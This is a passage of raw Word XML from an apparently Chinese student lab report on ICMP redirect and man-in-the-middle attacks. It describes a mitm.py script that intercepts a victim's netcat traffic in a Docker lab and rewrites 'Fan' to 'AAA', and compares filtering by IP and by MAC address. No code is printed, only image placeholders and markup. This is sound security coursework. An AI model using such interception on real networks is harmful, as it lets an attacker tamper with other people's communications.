                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5051539" cy="1868936"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="0689FA39">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4972050" cy="2214880"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="703527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27383" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId27"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4983169" cy="2219808"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A30338C">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4977765" cy="1146175"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="48419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9783" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId28"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4988654" cy="1148964"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="65487A36">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4859020" cy="1598930"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                  <wp:docPr id="1132193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783" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId29"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4865078" cy="1600801"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D92A39D">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5064125" cy="2498090"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="0"/>
                  <wp:docPr id="828888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8784" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId30"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5080807" cy="2506760"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E9DD02A">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5066665" cy="4102100"/>
                  <wp:effectExtent l="0" t="0" r="635" b="0"/>
                  <wp:docPr id="2037361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61502" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId31"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5070394" cy="4105273"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F82F62">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4933315" cy="743585"/>
                  <wp:effectExtent l="0" t="0" r="635" b="0"/>
                  <wp:docPr id="1291458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8407" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId32"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4948426" cy="745898"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C2B1FBC">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4762500" cy="723265"/>
                  <wp:effectExtent l="0" t="0" r="0" b="635"/>
                  <wp:docPr id="825013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13016" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId33"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4778546" cy="726044"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AE54D09"/>
          <w:p w14:paraId="4B81DCE0"/>
          <w:p w14:paraId="483C1947">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>修改后再次运行情况：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4510730A">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4684395" cy="4679315"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="6985"/>
                  <wp:docPr id="294012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12379" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId34"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4695802" cy="4690714"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="687D1637">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4830445" cy="2899410"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="0"/>
                  <wp:docPr id="2074660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60314" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId35"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4836309" cy="2903183"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="156B64FF">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4767580" cy="688975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="474033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33777" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId36"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4784478" cy="691808"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="55655EF7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4811395" cy="708660"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1399554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4773" name="图片 1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId37"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4825222" cy="711061"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="491AC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48E30E64">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果说明：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07689D15">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>修改mitm之前：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28EB41B6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>host 上的 nc 监听器会显示被修改的数据，即“Fan”被替换为“AAA”。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36D650F1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>victim 上发送的数据会经过 malicious-server，由于脚本的 MAC 地址过滤，只有来自特定源 MAC 地址的数据包会被修改。能够成功捕获和修改 TCP 数据包中的数据内容，显示了中间人攻击在数据包层面上的效果。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56EC0930">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="03FBB06C">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>修改后结果分析：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C0CFB8A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>当 mitm.py 使用源 IP 地址过滤器时，它只会捕获源自 10.9.0.5 的 TCP 数据包。更精确地捕获和修改流量，因为它只关注来自特定源 IP 的数据。host 上同样会看到被修改的数据。中间人攻击脚本能够成功拦截并修改从 victim 到 host 的数据包。但会陷入死循环，在maklicious上疯狂发送接收到报文。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="30E79C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249635FE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>问题1：i</w:t>
            </w:r>
            <w:r>
              <w:t>n your MITM program, you only need to capture the traffics in one direction. Please</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31A20D5E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>indicate which direction, and explain why.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="47955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198428CA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>答：在 MITM 攻击中，通常只需要捕获流量的一个方向，即来自目标（受害者）的流量。在我们的实验中，只需要捕获从 victim（ 10.9.0.5）发出的流量。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="406D990D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>原因：在大多数 MITM 攻击场景中，攻击者的目标是篡改或窥探从受害者机器发送的数据。通过捕获受害者发出的流量，攻击者可以对数据进行修改或记录。如果捕获和修改受害者机器发送的数据包（即发送方向），可以插入或修改数据（例如代码中，将数据中的“Fan”替换为“AAA”）。这使得攻击者能够干预通信并操控数据内容。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4C476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47C42EE2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>问题2：</w:t>
            </w:r>
            <w:r>
              <w:t>In the MITM program, when you capture the nc traffics from A (10.9.0.5), you can use A’s IP address or MAC address in the filter. One of the choices is not good and is going to create issues, even though both choices may work. Please try both, and use your experiment results to show which choice is the correct one, and please explain your conclusion.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="43BC7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14:paraId="61B7F929">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">答： </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BD71C23">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用 IP 地址过滤时，脚本能够捕获并修改从 10.9.0.5 发出的所有 TCP 数据包。无论该流量的目标 IP 地址是什么，都会被拦截并处理。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="252E3B0B">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用 MAC 地址过滤时，脚本只会捕获来自特定 MAC 地址的数据包。若 victim 机器的 MAC 地址发生变化或网络环境不同，这种过滤方式会失效。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A93D0C1">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用 IP 地址作为过滤条件比使用 MAC 地址更为可靠和适用，因为 IP 地址在网络中更稳定，不会受到 MAC 地址变化的影响。在网络攻击场景中，IP 地址过滤能更好地确保捕获目标流量。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="316CFBED"/>
    <w:p w14:paraId="051A53F0"/>
    <w:p w14:paraId="5B09757A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D39184">
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据这次实验，了解到ICMP 重定向攻击可以成功地修改受害者的路由表，但仅当指定的网关在本地网络中有效时，修改才会有效。如果指定的网关是远程地址或不存在的地址，受害者将无法实际发送数据包。同时，在 MITM 攻击中，使用 IP 地址作为过滤条件比使用 MAC 地址更为可靠和稳定。IP 地址在网络环境中较为固定，而 MAC 地址可能会因网络变化而导致过滤不准确。使用 IP 地址能确保捕获到来自特定源的流量，并且适用于多种网络环境。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CC14C1">
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遇到的问题一个是网络配置问题，可能需要时常重启docker。还有就是路由配置问题，之前在victim输入，attacker无法接收，重新进行了路由配置如下图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6B1A56">
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4791710" cy="2814320"/>
            <wp:effectExtent l="0" t="0" r="8890" b="5080"/>
            <wp:docPr id="602741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41506" name="图片 1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4797720" cy="2818213"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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D7531E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04D7531E"/>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0D191762"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D191762"/>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0F2E0C9D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F2E0C9D"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="500" w:hanging="50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154E0B5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="154E0B5E"/>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20DC53D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20DC53D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CCF5E93"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4CCF5E93"/>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019"/>
    <w:rsid w:val="000257CB"/>
    <w:rsid w:val="0003737E"/>
    <w:rsid w:val="00037894"/>
    <w:rsid w:val="00050E23"/>
    <w:rsid w:val="00056CA8"/>
    <w:rsid w:val="00062D70"/>
    <w:rsid w:val="00070855"/>
    <w:rsid w:val="000A5B3F"/>
    <w:rsid w:val="000A657D"/>
    <w:rsid w:val="00105D69"/>
    <w:rsid w:val="00120178"/>
    <w:rsid w:val="001379EC"/>
    <w:rsid w:val="00140B2F"/>
    <w:rsid w:val="00140E96"/>
    <w:rsid w:val="00142C41"/>
    <w:rsid w:val="00164C5B"/>
    <w:rsid w:val="0017447E"/>
    <w:rsid w:val="00182405"/>
    <w:rsid w:val="001E73EE"/>
    <w:rsid w:val="001F23E6"/>
    <w:rsid w:val="002062CA"/>
    <w:rsid w:val="002243F8"/>
    <w:rsid w:val="00254931"/>
    <w:rsid w:val="00277AAB"/>
    <w:rsid w:val="00277CB0"/>
    <w:rsid w:val="0028364F"/>
    <w:rsid w:val="002A793B"/>
    <w:rsid w:val="002C365D"/>
    <w:rsid w:val="002F05EC"/>
    <w:rsid w:val="003248DD"/>
    <w:rsid w:val="00330921"/>
    <w:rsid w:val="003329CA"/>
    <w:rsid w:val="003C0745"/>
    <w:rsid w:val="003D7AC8"/>
    <w:rsid w:val="00424FF1"/>
    <w:rsid w:val="00446019"/>
    <w:rsid w:val="00446426"/>
    <w:rsid w:val="004576D8"/>
    <w:rsid w:val="00471802"/>
    <w:rsid w:val="004A33FE"/>
    <w:rsid w:val="004B0680"/>
    <w:rsid w:val="004B6851"/>
    <w:rsid w:val="004D0119"/>
    <w:rsid w:val="004D361C"/>
    <w:rsid w:val="004E06DA"/>
    <w:rsid w:val="004E1C06"/>
    <w:rsid w:val="00505BCB"/>
    <w:rsid w:val="00537F4C"/>
    <w:rsid w:val="00557CF6"/>
    <w:rsid w:val="005622D1"/>
    <w:rsid w:val="00591B29"/>
    <w:rsid w:val="005A7E29"/>
    <w:rsid w:val="005B03AA"/>
    <w:rsid w:val="005F2B7D"/>
    <w:rsid w:val="00612DBD"/>
    <w:rsid w:val="00632AEF"/>
    <w:rsid w:val="006505A8"/>
    <w:rsid w:val="00672628"/>
    <w:rsid w:val="00677D5C"/>
    <w:rsid w:val="00690E88"/>
    <w:rsid w:val="006941BC"/>
    <w:rsid w:val="006A328E"/>
    <w:rsid w:val="006A66EA"/>
    <w:rsid w:val="006C3577"/>
    <w:rsid w:val="006D4DF1"/>
    <w:rsid w:val="006E22F1"/>
    <w:rsid w:val="00716FB9"/>
    <w:rsid w:val="007339A7"/>
    <w:rsid w:val="00735BAC"/>
    <w:rsid w:val="00737661"/>
    <w:rsid w:val="007472E0"/>
    <w:rsid w:val="007473CA"/>
    <w:rsid w:val="00755AD7"/>
    <w:rsid w:val="007633BB"/>
    <w:rsid w:val="00765548"/>
    <w:rsid w:val="007761F7"/>
    <w:rsid w:val="007B72A3"/>
    <w:rsid w:val="007E4693"/>
    <w:rsid w:val="007F367F"/>
    <w:rsid w:val="008072D5"/>
    <w:rsid w:val="00815607"/>
    <w:rsid w:val="0084186C"/>
    <w:rsid w:val="00855F33"/>
    <w:rsid w:val="0086205F"/>
    <w:rsid w:val="00870A87"/>
    <w:rsid w:val="00894294"/>
    <w:rsid w:val="00896B96"/>
    <w:rsid w:val="008B6910"/>
    <w:rsid w:val="008B7F62"/>
    <w:rsid w:val="008C2B90"/>
    <w:rsid w:val="008D27AB"/>
    <w:rsid w:val="008D798D"/>
    <w:rsid w:val="008E19B6"/>
    <w:rsid w:val="008F138B"/>
    <w:rsid w:val="008F229C"/>
    <w:rsid w:val="00901129"/>
    <w:rsid w:val="00921A6F"/>
    <w:rsid w:val="00923297"/>
    <w:rsid w:val="009456C3"/>
    <w:rsid w:val="009571A0"/>
    <w:rsid w:val="0096330B"/>
    <w:rsid w:val="00963574"/>
    <w:rsid w:val="00974E3D"/>
    <w:rsid w:val="0099672D"/>
    <w:rsid w:val="009A24F8"/>
    <w:rsid w:val="009A3B1D"/>
    <w:rsid w:val="009B3B41"/>
    <w:rsid w:val="009C67D9"/>
    <w:rsid w:val="009D1F6F"/>
    <w:rsid w:val="009F054A"/>
    <w:rsid w:val="00A027B2"/>
    <w:rsid w:val="00A17B6E"/>
    <w:rsid w:val="00A378B2"/>
    <w:rsid w:val="00A546F1"/>
    <w:rsid w:val="00A92061"/>
    <w:rsid w:val="00AA2747"/>
    <w:rsid w:val="00AC0698"/>
    <w:rsid w:val="00AC4C75"/>
    <w:rsid w:val="00AC5A04"/>
    <w:rsid w:val="00AD0B3C"/>
    <w:rsid w:val="00B15221"/>
    <w:rsid w:val="00B41279"/>
    <w:rsid w:val="00B5703F"/>
    <w:rsid w:val="00B7131A"/>
    <w:rsid w:val="00B80FFD"/>
    <w:rsid w:val="00BB0E05"/>
    <w:rsid w:val="00BB7E0B"/>
    <w:rsid w:val="00BC6C7F"/>
    <w:rsid w:val="00BD7949"/>
    <w:rsid w:val="00C0592A"/>
    <w:rsid w:val="00C20B7C"/>
    <w:rsid w:val="00C32E60"/>
    <w:rsid w:val="00C70B20"/>
    <w:rsid w:val="00C723C1"/>
    <w:rsid w:val="00CD3B10"/>
    <w:rsid w:val="00D16060"/>
    <w:rsid w:val="00D20DFF"/>
    <w:rsid w:val="00D517B6"/>
    <w:rsid w:val="00DB14FD"/>
    <w:rsid w:val="00DC34C8"/>
    <w:rsid w:val="00DD736E"/>
    <w:rsid w:val="00DE1FB5"/>
    <w:rsid w:val="00E01D1F"/>
    <w:rsid w:val="00E22FCB"/>
    <w:rsid w:val="00E23A44"/>
    <w:rsid w:val="00E6169B"/>
    <w:rsid w:val="00E62500"/>
    <w:rsid w:val="00E65EDC"/>
    <w:rsid w:val="00E83ABF"/>
    <w:rsid w:val="00EC6145"/>
    <w:rsid w:val="00ED6A25"/>
    <w:rsid w:val="00EF11EC"/>
    <w:rsid w:val="00EF5A22"/>
    <w:rsid w:val="00EF605F"/>
    <w:rsid w:val="00F03B86"/>
    <w:rsid w:val="00F077E5"/>
    <w:rsid w:val="00F12310"/>
    <w:rsid w:val="00F170C1"/>
    <w:rsid w:val="00F2225F"/>
    <w:rsid w:val="00F730D5"/>
    <w:rsid w:val="00F80A40"/>
    <w:rsid w:val="00F8709F"/>
    <w:rsid w:val="00F96A02"/>
    <w:rsid w:val="00FC1930"/>
    <w:rsid w:val="00FF63DA"/>
    <w:rsid w:val="1F302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1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2"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="260" w:after="260" w:line="416" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>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4">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:r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unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="hlink"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
